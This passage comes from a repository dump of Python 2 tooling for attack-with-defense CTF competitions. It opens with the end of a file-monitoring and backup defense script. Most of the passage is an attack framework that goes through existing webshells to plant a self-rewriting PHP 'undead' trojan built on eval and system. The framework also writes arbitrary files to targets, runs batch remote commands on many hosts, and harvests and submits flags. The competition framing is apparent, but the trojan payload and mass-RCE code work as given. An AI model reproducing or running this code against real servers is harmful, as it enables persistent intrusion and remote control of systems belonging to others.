168 | 			if check_list[i] != '0' and sign2 != 1:
169 | 				print check_file_list[i].replace('./',''),'Disappear!'
170 | 				sign2 = 0
171 | 		print "*******************************************************"
172 | 		print 'Total file:',len(new_list)
173 | 		print 'Total dir:',len(new_dir_list)
174 | 		print "*******************************************************"
175 | 		time.sleep(5)
176 | 
177 | def file_log_add():
178 | 	php_list=[]
179 | 	for root,dirs,files in os.walk('./',topdown=True):
180 | 		for f in files:
181 | 			if f[-4:] == '.php':
182 | 				php_list.append(root+'/'+f)
183 | 
184 | 	for i in range(len(php_list)):
185 | 		php_list[i] = php_list[i].replace('//','/')
186 | 		print php_list[i]
187 | 	print 'Total PHP file:',len(php_list)
188 | 	confirm = raw_input("Confirm Open Log Monitoring. 1 or 0:")
189 | 	if confirm == '1':
190 | 		print "*******************************************************"
191 | 		for i in range(len(php_list)):
192 | 			level_dir = 0
193 | 			for j in range(len(php_list[i])):
194 | 				if php_list[i][j] == '/':
195 | 					level_dir += 1
196 | 			lines = open(php_list[i],"r").readlines()
197 | 			length = len(lines)-1
198 | 			for j in range(length):
199 | 				if '<?php' in lines[j]:
200 | 					lines[j]=lines[j].replace('<?php','<?php\nrequire_once("./'+'../'*(level_dir-1)+'log.php");')
201 | 			open(php_list[i],'w').writelines(lines)
202 | 		print "Log monitoring turned on."
203 | 
204 | def file_backup():
205 | 	src = './'
206 | 	try:
207 | 		shutil.copytree(src,tgt)
208 | 		print "File backup succeed."
209 | 	except:
210 | 		print "File backup fail.Maybe it exists."
211 | 		
212 | def file_backup_remove():
213 | 	try:
214 | 		shutil.rmtree(tgt)
215 | 		print "File backup remove succeed."
216 | 	except:
217 | 		print "File backup remove fail.Maybe it doesn't exist."
218 | 
219 | print "*******************************************************"
220 | print "**************AWD_Auto_Defend_Framework****************"
221 | print "*******************************************************"
222 | global tgt
223 | tgt = './backup'
224 | while (1):
225 | 	print "*******************************************************"
226 | 	print "1.Build dir tree."
227 | 	print "2.Start file protect module."
228 | 	print "3.Start file monitor module."
229 | 	print "4.File backup."
230 | 	print "5.File backup remove."
231 | 	print "6.PHP file add log."
232 | 	choose = int(raw_input('Please Input:'))
233 | 	print "*******************************************************"
234 | 	if choose == 1:
235 | 		file_tree('./')
236 | 	if choose == 2:
237 | 		file_md5_defense()
238 | 	if choose == 3:
239 | 		file_md5_check()
240 | 	if choose == 4:
241 | 		file_backup()
242 | 	if choose == 5:
243 | 		file_backup_remove()
244 | 	if choose == 6:
245 | 		file_log_add()
246 | 


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/tools.py:
--------------------------------------------------------------------------------
  1 | # -*- coding:utf-8 -*-
  2 | 
  3 | import file_module
  4 | import request_module
  5 | import upload_module
  6 | import flag_module
  7 | import time
  8 | 
  9 | def flag_upload_address():#读取flag上传地址，填在flag_upload_address.txt里，没有可以不填。
 10 | 	print "*******************************************************"
 11 | 	print "**************Flag_Upload_Module_Loading***************"
 12 | 	print "*******************************************************"
 13 | 	global flag_upload_address
 14 | 	time.sleep(1)
 15 | 	flag_upload_address = file_module.read_txt_variable("flag_upload_address.txt")
 16 | 	request_module.test(flag_upload_address)
 17 | 
 18 | def team_token():#队伍token读取，填在team_token.txt里，没有可以不填。
 19 | 	print "*******************************************************"
 20 | 	print "**************Team_Token_Module_Loading****************"
 21 | 	print "*******************************************************"
 22 | 	time.sleep(1)
 23 | 	global team_token
 24 | 	team_token = file_module.read_txt_variable("team_token.txt")
 25 | 	
 26 | def team_base_url_list():#靶机shell路径，不包括shell本身，例如http://192.168.0.1/www/html/shell.php，填http://192.168.0.1/www/html/即可，填在team_base_url_list.txt，每个靶机独立一行，数量应一致。
 27 | 	print "*******************************************************"
 28 | 	print "***************Team_Url_Module_Loading*****************"
 29 | 	print "*******************************************************"
 30 | 	time.sleep(1)
 31 | 	global team_base_url_list
 32 | 	team_base_url_list = file_module.read_txt_array("team_base_url_list.txt")
 33 | 
 34 | def webshell_url():#靶机shell本身，填入shell名字,例如shell.php，config.php等，填在webshell.txt，每个靶机独立一行，数量应一致。
 35 | 	print "*******************************************************"
 36 | 	print "**************Webshell_Module_Loading******************"
 37 | 	print "*******************************************************"
 38 | 	time.sleep(1)
 39 | 	global team_base_url_list
 40 | 	global webshell
 41 | 	webshell = file_module.read_txt_array("webshell.txt")
 42 | 	webshell_url = []
 43 | 	for i in range(len(webshell)):
 44 | 		webshell_url.append(team_base_url_list[i]+webshell[i])
 45 | 		try:
 46 | 			request_module.test(webshell_url[i])
 47 | 			print webshell_url[i],"Works Well"
 48 | 			print "*******************************************************"
 49 | 		except:
 50 | 			print webshell_url[i],"Fail"
 51 | 			print "*******************************************************"
 52 | 	
 53 | def trojan_url():#将要植入的不死马名称，可以随意填写，填在trojan.txt，每个靶机独立一行，数量应一致。
 54 | 	print "*******************************************************"
 55 | 	print "****************Trojan_Module_Loading******************"
 56 | 	print "*******************************************************"
 57 | 	time.sleep(1)
 58 | 	global team_base_url_list
 59 | 	global trojan
 60 | 	trojan = file_module.read_txt_array("trojan.txt")
 61 | 	trojan_url = []
 62 | 	for i in range(len(trojan)):
 63 | 		trojan_url.append(team_base_url_list[i]+trojan[i])
 64 | 		upload_module.check(trojan_url[i])
 65 | 		print "*******************************************************"
 66 | 
 67 | 			
 68 | def trojan_implant():#植入木马，通过执行php命令写入木马，预置php不死马，内容可以自定义。
 69 | 	print "*******************************************************"
 70 | 	print "**************Implant_Module_Loading*******************"
 71 | 	print "*******************************************************"
 72 | 	time.sleep(1)
 73 | 	global team_base_url_list
 74 | 	global webshell
 75 | 	global trojan
 76 | 	key = raw_input("Input Your Webshell's Password:")#一句话木马的密码。
 77 | 	for i in range(len(team_base_url_list)):#以下为自定义内容。
 78 | 		payload = ''
 79 | 		payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
 80 | 		payload += "'"
 81 | 		payload += trojan[i]
 82 | 		payload += "'"
 83 | 		payload += ';$code='
 84 | 		payload += "'"
 85 | 		payload += '<?php @eval($_POST[a]);system($_POST[b]); ?>'
 86 | 		payload += "'"
 87 | 		payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
 88 | 		#以上为自定义内容。
 89 | 		trojan_data = {key:payload}
 90 | 		upload_module.implant(team_base_url_list[i],webshell[i],trojan[i],trojan_data)
 91 | 		
 92 | def file_implant():#植入文件，通过执行php命令写入，内容在file_data.txt填入。
 93 | 	print "*******************************************************"
 94 | 	print "**************File_Upload_Module_Loading***************"
 95 | 	print "*******************************************************"
 96 | 	time.sleep(1)
 97 | 	global team_base_url_list
 98 | 	global webshell
 99 | 	file_name = raw_input("Input Your File's Name:")
100 | 	file_data = file_module.read_txt_variable("file_data.txt")
101 | 	payload = ''
102 | 	payload += '$file='
103 | 	payload += "'"
104 | 	payload += file_name
105 | 	payload += "';"
106 | 	payload += '$code='
107 | 	payload += "'"
108 | 	payload += file_data
109 | 	payload += "';"
110 | 	payload += 'file_put_contents($file,$code);'
111 | 	key = raw_input("Input Your Webshell's Password:")#一句话木马的密码。
112 | 	file_data = {key:payload}
113 | 	for i in range(len(team_base_url_list)):
114 | 		upload_module.implant(team_base_url_list[i],webshell[i],file_name,file_data)
115 | 
116 | def living_check():#存活检测，检测一开始的webshell以及后面植入的木马存活。
117 | 	print "*******************************************************"
118 | 	print "*************Living_Check_Module_Loading***************"
119 | 	print "*******************************************************"
120 | 	time.sleep(1)
121 | 	webshell_count = 0
122 | 	trojan_count = 0
123 | 	global webshell_list
124 | 	global trojan_list
125 | 	global webshell_fail_list
126 | 	global trojan_fail_list
127 | 	webshell_list = []
128 | 	trojan_list = []
129 | 	webshell_fail_list = []
130 | 	trojan_fail_list = []
131 | 	for i in range(len(team_base_url_list)):
132 | 		webshell_live = upload_module.check(team_base_url_list[i]+webshell[i])
133 | 		trojan_live =upload_module.check(team_base_url_list[i]+trojan[i])
134 | 		if (webshell_live == 1):
135 | 			webshell_count += 1
136 | 			webshell_list.append(team_base_url_list[i]+webshell[i])
137 | 		if (webshell_live == 0):
138 | 			webshell_fail_list.append(team_base_url_list[i]+webshell[i])
139 | 		if (trojan_live == 1):
140 | 			trojan_count += 1
141 | 			trojan_list.append(team_base_url_list[i]+trojan[i])
142 | 		if (trojan_live == 0):
143 | 			trojan_fail_list.append(team_base_url_list[i]+trojan[i])
144 | 	print webshell_count,'Teams Webshell Living.'
145 | 	for i in range(len(webshell_list)):
146 | 		print "Team",i,":",webshell_list[i]
147 | 	print "*******************************************************"
148 | 	print trojan_count,'Teams Trojan Living.'
149 | 	for i in range(len(trojan_list)):
150 | 		print "Team",i,":",trojan_list[i]
151 | 	print "*******************************************************"
152 | 
153 | def remote_command():#单个靶机RCE，输入stop停止。
154 | 	print "*******************************************************"
155 | 	print "*************Remote_Command_Module_Loading*************"
156 | 	print "*******************************************************"
157 | 	time.sleep(1)
158 | 	global webshell_list
159 | 	global trojan_list
160 | 	choose_team = int(raw_input('Input A Team:'))
161 | 	stop = 0
162 | 	while (stop != 1):
163 | 		stop=flag_module.rce(trojan_list[choose_team])
164 | 
165 | def remote_command_multi():#批量靶机RCE，输入stop停止。
166 | 	print "*******************************************************"
167 | 	print "*********Remote_Command_Multi_Module_Loading***********"
168 | 	print "*******************************************************"
169 | 	global trojan_list
170 | 	time.sleep(2)
171 | 	multi_command = raw_input("Command:")
172 | 	while (1):
173 | 		if multi_command == 'stop':
174 | 			break
175 | 		for i in range(len(trojan_list)):
176 | 			flag_module.rce_multi(trojan_list[i],multi_command)
177 | 		multi_command = raw_input("Command:")
178 | 		
179 | def confirm():#确认当前配置。
180 | 	print "*******************************************************"
181 | 	print "****************Confirm_Module_Loading*****************"
182 | 	print "*******************************************************"
183 | 	time.sleep(1)
184 | 	global flag_upload_address
185 | 	global team_token
186 | 	print "The Flag Upload Address:",flag_upload_address
187 | 	print "*******************************************************"
188 | 	print "The Team Token:",team_token
189 | 	print "*******************************************************"
190 | 	for i in range(len(team_base_url_list)):
191 | 		print team_base_url_list[i]
192 | 	print "Total Team Number:",len(team_base_url_list)
193 | 	print "*******************************************************"
194 | 	for i in range(len(webshell)):
195 | 		print webshell[i]
196 | 	print "Total Webshell:",len(webshell)
197 | 	print "*******************************************************"
198 | 	for i in range(len(trojan)):
199 | 		print trojan[i]
200 | 	print "Total Trojan:",len(trojan)
201 | 	print "*******************************************************"
202 | 	
203 | def catch_flag():#获取flag
204 | 	print "*******************************************************"
205 | 	print "***************Catch_Flag_Module_Loading***************"
206 | 	print "*******************************************************"
207 | 	time.sleep(1)
208 | 	global trojan_list
209 | 	for i in range(len(trojan_list)):
210 | 		flag_module.get_flag(trojan_list[i])
211 | 	print "*******************************************************"
212 | 
213 | def store_flag():#获取flag并且存在flag.txt中。
214 | 	print "*******************************************************"
215 | 	print "***************Store_Flag_Module_Loading***************"
216 | 	print "*******************************************************"
217 | 	time.sleep(1)
218 | 	global trojan_list
219 | 	for i in range(len(trojan_list)):
220 | 		flag = flag_module.get_store_flag(trojan_list[i])
221 | 		file_module.write_txt("flag.txt",flag)
222 | 	file_module.write_txt("flag.txt","*******************************************************\r\n")
223 | 
224 | def upload_flag():#提交flag
225 | 	print "*******************************************************"
226 | 	print "**************Upload_Flag_Module_Loading***************"
227 | 	print "*******************************************************"
228 | 	time.sleep(1)
229 | 	global flag_upload_address
230 | 	global team_token
231 | 	for i in range(len(trojan_list)):
232 | 		flag = flag_module.get_store_flag(trojan_list[i])
233 | 		payload = {'token':team_token,'flag':flag}
234 | 		request_module.get(flag_upload_address,payload)
235 | 	print "*******************************************************"
236 | 	


--------------------------------------------------------------------------------